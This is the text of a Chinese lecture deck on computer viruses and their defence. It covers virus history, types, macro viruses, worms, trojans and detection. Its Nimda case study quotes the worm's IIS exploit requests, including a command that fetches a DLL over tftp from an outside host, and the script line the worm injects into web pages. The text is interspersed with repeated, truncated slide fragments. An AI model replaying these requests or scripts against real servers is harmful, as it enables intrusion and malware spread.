計算機病毒與防御課件

第九章計算機病毒與防御指導(dǎo)教師：李云亮第九章計算機病毒與防御指導(dǎo)教師：李云亮網(wǎng)絡(luò)安全防護體系構(gòu)架網(wǎng)絡(luò)安全評估安全防護網(wǎng)絡(luò)安全服務(wù)系統(tǒng)漏洞掃描網(wǎng)絡(luò)管理評估病毒防護體系網(wǎng)絡(luò)監(jiān)控數(shù)據(jù)保密網(wǎng)絡(luò)訪問控制應(yīng)急服務(wù)體系安全技術(shù)培訓(xùn)數(shù)據(jù)恢復(fù)網(wǎng)絡(luò)安全防護體系構(gòu)架網(wǎng)絡(luò)安全防護體系構(gòu)架網(wǎng)絡(luò)安全評估安全防護網(wǎng)絡(luò)安全服務(wù)系統(tǒng)漏洞本章要求掌握計算機病毒的概念及意義了解計算機病毒的發(fā)展史與危害熟悉計算機病毒的主要特性掌握計算機病毒的分類、查殺與防范方法。本章要求掌握計算機病毒的概念及意義4|PresentationTitle|Month2009本章任務(wù)：完成三個Task有關(guān)病毒的實驗4|PresentationTitle|Month

任務(wù)要求：通過建立自動宏，了解宏病毒的工作原理。任務(wù)擴展：Task1.宏病毒工作原理考慮能否利用自動宏啟動其他程序？考慮自動宏能否禁止？Task1.宏病毒工作原理考慮能否利用自動宏啟動其他程序

任務(wù)要求：通過建立U盤自動運行文件，了解U盤病毒的工作原理。任務(wù)擴展：Task2.U盤病毒工作原理考慮能否利用自動啟動文件啟動其他程序？考慮能在U盤中實現(xiàn)免疫功能嗎？Task2.U盤病毒工作原理考慮能否利用自動啟動文件啟動

任務(wù)要求：掌握軟件的安裝、配置及使用方法。Task3.查殺病毒Task3.查殺病毒8|PresentationTitle|Month2009認識計算機病毒8|PresentationTitle|Month2005年影響中國網(wǎng)絡(luò)安全的十大熱點事件之一

●“MSN性感雞”，網(wǎng)絡(luò)提前遭遇“禽流感”

2005年影響中國網(wǎng)絡(luò)安全的十大熱點事件之一●“MSN性感●狙擊波，與時間賽跑的病毒

Worm.Zotob.aWorm.sasserWorm.Blaster.F●狙擊波，與時間賽跑的病毒W(wǎng)orm.Zotob.aWor●手機病毒過百

自從2004年6月第一次發(fā)現(xiàn)在智能手機上傳播的病毒以后，手機惡意程序的數(shù)量大幅提升。在手機上傳播的病毒已經(jīng)跨越100個大門，達到102個。目前手機病毒主要采用藍牙、電子郵件、鏈接PC以及瀏覽互聯(lián)網(wǎng)下載安裝軟件等多種方式傳播。以損壞聯(lián)系人名單、損耗電池、盜取資料和浪費話費等破壞為多。金山毒霸手機版（KingsoftMobileSecrity）●手機病毒過百自從2004年6月第一次發(fā)現(xiàn)在智能手機上傳播貓癬病毒帶來的灰色產(chǎn)業(yè)鏈二次分工

2009年1月18日，金山毒霸云安全中心在國內(nèi)率先發(fā)布“貓癬”節(jié)前病毒預(yù)警。2月3日，春節(jié)前小范圍爆發(fā)的“貓癬”在春節(jié)期間瘋狂傳播，變種數(shù)量多達500個，平均每天全國就有40萬臺電腦染毒。最明顯的中毒癥狀：電腦桌面上出現(xiàn)usp10.dll文件、迅雷無法啟動及安全軟件自動關(guān)閉，并且伴隨網(wǎng)游帳號被盜。目標囊括魔獸世界、大話西游onlineII、劍俠世界、封神榜II、完美系列游戲、夢幻西游、魔域等主流游戲，對用戶的虛擬財產(chǎn)影響巨大。木馬/病毒背后早已日漸形成一條巨大的黑色產(chǎn)業(yè)鏈。不管是網(wǎng)銀中真實的錢，還是虛擬財產(chǎn)，制造木馬、傳播木馬、盜竊賬戶信息、第三方平臺銷贓、洗錢，他們的分工明確，形成了一個非常完善的流水性作業(yè)的程序。

貓癬病毒帶來的灰色產(chǎn)業(yè)鏈二次分工

2009年1月18日，金山央視3.15晚會曝光網(wǎng)銀詐騙3月15日，央視315晚會曝光一名叫“頂狐”的黑客，通過自己制造木馬程序，盜取大量用戶的網(wǎng)上銀行信息，用很低廉的價格在網(wǎng)上出售，危及大量網(wǎng)銀用戶的安全。

央視315晚會報道，“頂狐”通過木馬程序，盜取個人的網(wǎng)銀信息，后對盜取回來的信息分類整理，將密碼等信息廉價出售，而網(wǎng)上銀行用戶信息則以400元每G的價格打包售出。這導(dǎo)致大量的網(wǎng)銀用戶存款被盜。淪為“肉雞”的電腦，除了央視315晚會曝光的網(wǎng)銀帳號受到威脅外，黑客還可以輕易獲得用戶的炒股帳號、網(wǎng)游帳號密碼等信息。此外，遠程控制用戶的攝像頭，曝光隱私；竊取“肉雞”電腦里的虛擬財產(chǎn)以及商業(yè)機密。為了維護整個互聯(lián)網(wǎng)安全環(huán)境，讓廣大網(wǎng)民擺脫“肉雞”威脅，金山毒霸緊急研發(fā)了完全免費的“肉雞檢測器”，全面剿殺肉雞。央視3.15晚會曝光網(wǎng)銀詐騙3月15日，央視315晚會曝光14|PresentationTitle|Month2009了解計算機病毒14|PresentationTitle|Mont9.1.1計算機病毒的定義

在《中華人民共和國計算機信息系統(tǒng)安全保護條例》中被明確定義，計算機病毒是“指編制或者在計算機程序中插入的破壞計算機功能或者破壞數(shù)據(jù)，影響計算機使用并且能夠自我復(fù)制的一組計算機指令或者程序代碼”。從廣義上講，一些惡意程序雖然不能自我復(fù)制，但會對計算機系統(tǒng)產(chǎn)生破壞或嚴重損害計算機使用者的利益，這些程序往往也被歸類為計算機病毒，如木馬程序等。9.1.1計算機病毒的定義在《中華人民共和國計算機[思考與討論]

不按正常步驟操作計算機、玩游戲、上網(wǎng)和收發(fā)郵件，這些行為會產(chǎn)生計算機病毒嗎？[思考與討論]9.1.2計算機病毒的發(fā)展史計算機病毒的產(chǎn)生的思想基礎(chǔ)和病毒發(fā)展簡介實驗室中產(chǎn)生——病毒的祖先（磁芯大戰(zhàn)）計算機病毒的出現(xiàn)我國計算機病毒的出現(xiàn)9.1.2計算機病毒的發(fā)展史計算機病毒的產(chǎn)生的思想基礎(chǔ)和1.計算機病毒的產(chǎn)生最早提出電腦病毒概念的是電腦的先驅(qū)者馮·諾伊曼。在他的一篇論文《復(fù)雜自動裝置的理論及組識的進行》里，勾勒出病毒程序自我繁殖的基本原理。不過在當(dāng)時，絕大部分的電腦專家都無法想像會有這種能自我繁殖的程序。病毒的提出1.計算機病毒的產(chǎn)生最早提出電腦病毒概念的是病毒的祖先——磁芯大戰(zhàn)三個年輕的程序員在工作之余設(shè)計出一種電子游戲叫做“磁芯大戰(zhàn)”。玩這個游戲的兩個人編制許多能自身復(fù)制并可保存在磁芯存儲器中的程序，然后發(fā)出信號，雙方的程序在指令控制下就會竭力去消滅對方的程序，在預(yù)定時間內(nèi)，誰的程序繁殖的多，誰就勝。這種有趣的游戲很快傳播到其他電腦中心。雖然這種游戲?qū)Ξ?dāng)時孤立的電腦影響不大，但對網(wǎng)絡(luò)系統(tǒng)卻影響很大。因此，玩“磁芯大戰(zhàn)”的人默守誓言，不把游戲的細節(jié)公開。磁芯大戰(zhàn)病毒的祖先——磁芯大戰(zhàn)三個年輕的程序員在工作之病毒的產(chǎn)生原因編制人員出于一種炫耀和顯示自己能力的目的某些軟件作者出于版權(quán)保護的目的而編制出于某種報復(fù)目的或惡作劇而編寫病毒出于政治、戰(zhàn)爭的需要病毒的產(chǎn)生原因2.病毒的發(fā)展歷程DOS引導(dǎo)階段DOS可執(zhí)行階段伴隨階段多形階段生成器、變體機階段網(wǎng)絡(luò)、蠕蟲階段視窗階段宏病毒階段郵件病毒階段手持移動設(shè)備病毒階段2.病毒的發(fā)展歷程DOS引導(dǎo)階段

時代劃分時間總結(jié)第一代：傳統(tǒng)病毒1986-1989DOS引導(dǎo)階段、DOS可執(zhí)行階段第二代：混合病毒(超級病毒)1989-1991伴隨、批次型階段第三代：多態(tài)性病毒1992-1995幽靈、多形階段、生成器、變體機階段第四代：90年代中后宏病毒階段、網(wǎng)絡(luò)、蠕蟲階段新一代病毒：

21世紀以來蠕蟲已成為目前病毒的主流 時代劃分時間總結(jié)第一代：傳統(tǒng)病毒1986-1989DOS引病毒的發(fā)展歷程時間名稱事件1987Brain（巴基斯坦大腦）第一個病毒（軟盤引導(dǎo)）1987黑色星期五病毒第一大規(guī)模爆發(fā)1988.11.2蠕蟲病毒

第一個蠕蟲計算機病毒

1990.1“4096”發(fā)現(xiàn)首例隱蔽型病毒，破壞數(shù)據(jù)1991病毒攻擊應(yīng)用于戰(zhàn)爭

1991米開朗基羅第一個格式化硬盤的開機型病毒1992VCL-VirusCreationLaboratory病毒生產(chǎn)工具在美國傳播病毒的發(fā)展歷程時間名稱事件1987Brain（巴基斯坦大腦時間名稱事件1992年9月首例Windows病毒1995FAT病毒、幽靈、變形金剛多態(tài)性（基于）windows）1997宏病毒

傳播方式增加（郵件等）1998CIH發(fā)現(xiàn)破壞計算機硬件病毒1999Mellisa\happy99郵件病毒2000紅色代碼黑客型病毒2001Nimda集中了所有蠕蟲傳播途徑2002SQLSPIDA.B第一個攻擊SQL服務(wù)器2003SQL_slammer利用SQLserver數(shù)據(jù)庫的漏洞2003.8.11沖擊波集中了所有蠕蟲傳播途徑2004震蕩波Sasser 利用緩沖區(qū)溢出傳播蠕蟲時間名稱事件1992年9月首例Windows病毒1995FA20年來破壞力最大的10種計算機病毒CIH（1998年）梅利莎（Melissa,1999年）愛蟲（Iloveyou,2000年）紅色代碼（Codered,2001年）SQLSlammer(2003年)沖擊波（Blaster,2003年）大無級.F(Sobig.r,2003年)貝革熱（Bagle,2004年）MyDoom(2004年)震蕩波（Sasser,2004年）20年來破壞力最大的10種計算機病毒CIH（1998年）沖擊9.1.3計算機病毒的危害計算機病毒造成巨大的社會經(jīng)濟損失影響政府職能部門正常工作的開展計算機病毒被賦予越來越多的政治意義利用計算機病毒犯罪現(xiàn)象越來越嚴重9.1.3計算機病毒的危害計算機病毒造成巨大的社會經(jīng)濟損失病毒帶來的威脅近年來全球重大電腦病毒疫情及損失的統(tǒng)計圖：病毒帶來的威脅近年來全球重大電腦病毒疫情及損失的統(tǒng)計圖：9.1.4計算機病毒的特征破壞性傳染性

隱蔽性寄生性

可觸發(fā)性可執(zhí)行性9.1.4計算機病毒的特征9.2計算機病毒的種類依據(jù)不同的分類標準，計算機病毒可以做不同的歸類。常見的分類標準有：1.根據(jù)病毒依附的操作系統(tǒng)2.根據(jù)病毒的攻擊方式3.根據(jù)病毒的傳播媒介4.根據(jù)病毒的傳播途徑9.2計算機病毒的種類依據(jù)不同的分類標準，計算機病毒可以做依據(jù)不同的分類標準，計算機病毒可以做不同的歸類。常見的分類標準有：根據(jù)病毒依附的操作系統(tǒng)根據(jù)病毒的攻擊方式根據(jù)病毒的傳播媒介根據(jù)病毒的傳播途徑9.2計算機病毒的種類依據(jù)不同的分類標準，計算機病毒可以做不同的歸類。常見的分類標病毒攻擊的操作系統(tǒng)MicrosoftDOSMicrosoftWindows95/98/MEMicrosoftWindowsNT/2000/XPUnix(Linux)其他操作系統(tǒng)病毒攻擊的操作系統(tǒng)MicrosoftDOS病毒的傳播媒介存儲介質(zhì)網(wǎng)絡(luò)郵件(SoBig)網(wǎng)頁(RedLof)局域網(wǎng)(Funlove)遠程攻擊(Blaster)網(wǎng)絡(luò)下載病毒的傳播媒介存儲介質(zhì)病毒的傳播和感染對象感染引導(dǎo)區(qū)感染文件可執(zhí)行文件OFFICE宏網(wǎng)頁腳本（Java小程序和ActiveX控件）網(wǎng)絡(luò)蠕蟲網(wǎng)絡(luò)木馬破壞程序其他惡意程序病毒的傳播和感染對象感染引導(dǎo)區(qū)引導(dǎo)型病毒

引導(dǎo)型病毒文件型病毒

文件型病毒的特點是附著于正常程序文件，成為程序文件的一個外殼或部件。文件型病毒主要以感染文件擴展名為.com、.exe和.bat等可執(zhí)行程序為主。大多數(shù)的文件型病毒都會把它們自己的代碼復(fù)制到其宿主文件的開頭或結(jié)尾處。

文件型病毒文件型病毒的特點是附著于正常程序文件，成為程序文紅色代碼

1()

紅色代碼

1(www.white計算機病毒引起是異常情況計算機系統(tǒng)運行速度明顯降低系統(tǒng)容易死機文件改變、破壞磁盤空間迅速減少內(nèi)存不足系統(tǒng)異常頻繁重啟動頻繁產(chǎn)生錯誤信息計算機病毒引起是異常情況計算機系統(tǒng)運行速度明顯降低常見病毒分析1．引導(dǎo)記錄病毒引導(dǎo)型病毒的傳播、破壞過程引導(dǎo)型病毒實例：小球病毒2．文件型病毒文件型病毒的類型文件型病毒的感染方式.COM文件的感染.EXE文件的感染.SYS文件的感染常見病毒分析1．引導(dǎo)記錄病毒2.宏病毒的行為和特征常見病毒分析

宏病毒是一種新形態(tài)的計算機病毒，也是一種跨平臺式計算機病毒。可以在Windows、Windows95/98/NT、OS/2、Macintosh等操作系統(tǒng)上執(zhí)行病毒行為。

宏病毒的主要特征如下：宏病毒會感染.DOC文檔和.DOT模板文件。宏病毒的傳染通常是Word在打開一個帶宏病毒的文檔或模板時，激活宏病毒。2.宏病毒的行為和特征常見病毒分析宏病毒是一種多數(shù)宏病毒包含AutoOpen、AutoClose、AutoNew和AutoExit等自動宏，通過這些自動宏病毒取得文檔（模板）操作權(quán)。宏病毒中總是含有對文檔讀寫操作的宏命令。宏病毒在.DOC文檔、.DOT模板中以BFF（BinaryFileFormat）格式存放，這是一種加密壓縮格式，每個Word版本格式可能不兼容。宏病毒具有兼容性。第9章_計算機病毒與防御課件宏病毒的特點傳播極快制作、變種方便破壞可能性極大宏病毒的特點傳播極快Word宏病毒，是近年來被人們談?wù)摰米疃嗟囊环N計算機病毒。與那些用復(fù)雜的計算機編程語言編制的病毒相比，宏病毒的防治要容易得多！在了解了Word宏病毒的編制、發(fā)作過程之后，即使是普通的計算機用戶，不借助任何殺毒軟件，就可以較好地對其進行防冶。宏病毒的防治和清除方法Word宏病毒，是近年來被人們談?wù)摰米疃嗟囊环N計算查看“可疑”的宏按使用習(xí)慣編制宏防備Autoxxxx宏小心使用外來的Word文檔使用選項“PrompttoSaveNormalTemplate”（工具-選項-保存）查看宏代碼并刪除將文檔存儲為RTF格式設(shè)置Normal.dot的只讀屬性Normal.dot的密碼保護使用OFFICE的報警設(shè)置查看“可疑”的宏3.網(wǎng)絡(luò)化病毒的特點網(wǎng)絡(luò)化：傳播速度快、爆發(fā)速度快、面廣隱蔽化：具有欺騙性（加密）多平臺、多種語言新方式：與黑客、特洛伊木馬相結(jié)合多途徑：攻擊反病毒軟件變化快（變種）清除難度大破壞性強3.網(wǎng)絡(luò)化病毒的特點網(wǎng)絡(luò)化：傳播速度快、爆發(fā)速度快、面廣蠕蟲病毒通過網(wǎng)絡(luò)傳播的惡性病毒,它具有病毒的一些共性,如傳播性,隱蔽性,破壞性等等,同時具有自己的一些特征，如不利用文件寄生（有的只存在于內(nèi)存中）,對網(wǎng)絡(luò)造成拒絕服務(wù)，以及和黑客技術(shù)相結(jié)合等等。蠕蟲病毒通過網(wǎng)絡(luò)傳播的惡性病毒,它具有病毒的一些1.蠕蟲病毒與其他病毒的區(qū)別普通病毒蠕蟲病毒

存在形式

寄存文件獨立程序傳染機制宿主程序運行主動攻擊

傳染目標本地文件網(wǎng)絡(luò)計算機1.蠕蟲病毒與其他病毒的區(qū)別普通病毒蠕蟲病毒

存在形式

寄2.蠕蟲病毒的特點

破壞性強傳染方式多（一種是針對企業(yè)的局域網(wǎng)，主要通過系統(tǒng)漏洞；另外一種是針對個人用戶的,主要通過電子郵件,惡意網(wǎng)頁形式迅速傳播的蠕蟲病毒。）傳播速度快清除難度大

2.蠕蟲病毒的特點

破壞性強3.實例：2003蠕蟲王3.實例：2003蠕蟲王4.病毒實例——Nimda及解決方案之一感染W(wǎng)in95/98/NT/2000系統(tǒng)1.通過email

在internet臨時文件夾中讀取所有"htm"，"html"文件并從中提取email地址，

從信箱讀取email并從中提取SMTP服務(wù)器，然后發(fā)送readme.eml。4.病毒實例——Nimda及解決方案之一感染W(wǎng)in95/Nimda--2.利用IIS、IE的安全漏洞CodeRedII會在IIS的幾個可執(zhí)行目錄下放置root.exe

Nimda首先在udp/69上啟動一個tftp服務(wù)器然后會作以下掃描：GET/scripts/root.exe?/c+dirHTTP/1.0

GET/MSADC/root.exe?/c+dirHTTP/1.0

GET/c/winnt/system32/cmd.exe?/c+dirHTTP/1.0

GET/d/winnt/system32/cmd.exe?/c+dirHTTP/1.0……一旦發(fā)現(xiàn)有弱點的系統(tǒng)就使用類似下面的命令

GET/scripts/root.exe?/c+tftp-ixxx.xxx.xxx.xxxGETAdmin.dllHTTP/1.0

把文件傳到主機上去，然后再

GET/scripts/Admin.dllHTTP/1.0Nimda--2.利用IIS、IE的安全漏洞CodeNimda--3.通過WWW服務(wù)在所有文件名中包含default/index/main/readme并且擴展名為htm/html/asp的文件所在目錄中創(chuàng)建readme.eml，并在文件末加上下面這一行

<html><scriptlanguage="JavaScript">window.open("readme.eml",null,"resizable=no,top=6000,left=6000")</script></html>

也就是說如果一臺web服務(wù)器被感染了，那么大部分訪問過此服務(wù)器的機器都會被感染。

Nimda--3.通過WWW服務(wù)在所有文件名中包含defaNimda--4.通過局域網(wǎng)的共享Nimda會搜索本地的共享目錄中包含doc文件的目錄，一但找到，就會把自身復(fù)制到目錄中命名為riched20.dllNimda--4.通過局域網(wǎng)的共享Nimda會搜索本地的共病毒實例——Nimda及解決方案首先對網(wǎng)絡(luò)中的工作站進行全面清查對已感染的工作站進行徹底的殺毒，然后對已染毒的服務(wù)器殺毒以保證整個網(wǎng)絡(luò)系統(tǒng)是干凈的；對網(wǎng)絡(luò)中的服務(wù)器及工作站進行軟件升級等一系列后續(xù)工程，杜絕再次染毒打微軟IIS、IE的補丁最后著重對服務(wù)器進行本地安全策略的設(shè)置，做好防范工作，做到即使服務(wù)器再次中毒也不能影響整個服務(wù)器的正常工作及整個網(wǎng)絡(luò)系統(tǒng)的正常運轉(zhuǎn)。病毒實例——Nimda及解決方案首先對網(wǎng)絡(luò)中的工作站進行全面木馬病毒木馬是一種可以駐留在對方系統(tǒng)中的一種程序。木馬一般由兩部分組成：服務(wù)器端和客戶端。駐留在對方服務(wù)器的稱之為木馬的服務(wù)器端，遠程的可以連到木馬服務(wù)器的程序稱之為客戶端。木馬的功能是通過客戶端可以操縱服務(wù)器，進而操縱對方的主機。木馬病毒木馬是一種可以駐留在對方系統(tǒng)中的一種程序。木馬來自于“特洛伊木馬”，英文名稱為TrojanHorse。傳說希臘人圍攻特洛伊城，久久不能攻克，后來軍師想出了一個特洛伊木馬計，讓士兵藏在巨大的特洛伊木馬中部隊假裝撤退而將特洛伊木馬丟棄在特洛伊城下，讓敵人將其作為戰(zhàn)利品拖入城中，到了夜里，特洛伊木馬內(nèi)的士兵便趁著夜里敵人慶祝勝利、放松警惕的時候從特洛伊木馬里悄悄地爬出來，與城外的部隊里應(yīng)外合攻下了特洛伊城。由于特洛伊木馬程序的功能和此類似，故而得名。

木馬程序在表面上看上去沒有任何的損害，實際上隱藏著可以控制用戶整個計算機系統(tǒng)、打開后門等危害系統(tǒng)安全的功能。木馬來自于“特洛伊木馬”，英文名稱為TrojanHorse

木馬的發(fā)展木馬程序技術(shù)發(fā)展至今，已經(jīng)經(jīng)歷了4代第一代，即是簡單的密碼竊取，發(fā)送等。第二代木馬，在控制技術(shù)上有了很大的進步，冰河可以說為是國內(nèi)木馬的典型代表之一。第三代木馬在數(shù)據(jù)傳輸技術(shù)上，又做了不小的改進，出現(xiàn)了ICMP等類型的木馬，利用畸形報文傳遞數(shù)據(jù)，增加了查殺的難度。第四代木馬在進程隱藏方面，做了大的改動，采用了內(nèi)核插入式的嵌入方式，利用遠程插入線程技術(shù)，嵌入DLL線程。木馬的發(fā)展木馬程序技術(shù)發(fā)展至今，已經(jīng)經(jīng)歷了4代第一常見的簡單得木馬有NetBus遠程控制、“冰河”木馬、PCAnyWhere遠程控制等等。這里介紹一種最常見的木馬程序：“冰河”?！氨印卑瑑蓚€程序文件，一個是服務(wù)器端，另一個是客戶端。常見的簡單得木馬有NetBus遠程控制、“冰河”木馬、PCA58|PresentationTitle|Month2009計算機病毒防治58|PresentationTitle|Mont反病毒技術(shù)簡述計算機病毒診斷技術(shù)1．校驗和法診斷 2．掃描法診斷3．行為監(jiān)測法診斷4．分析法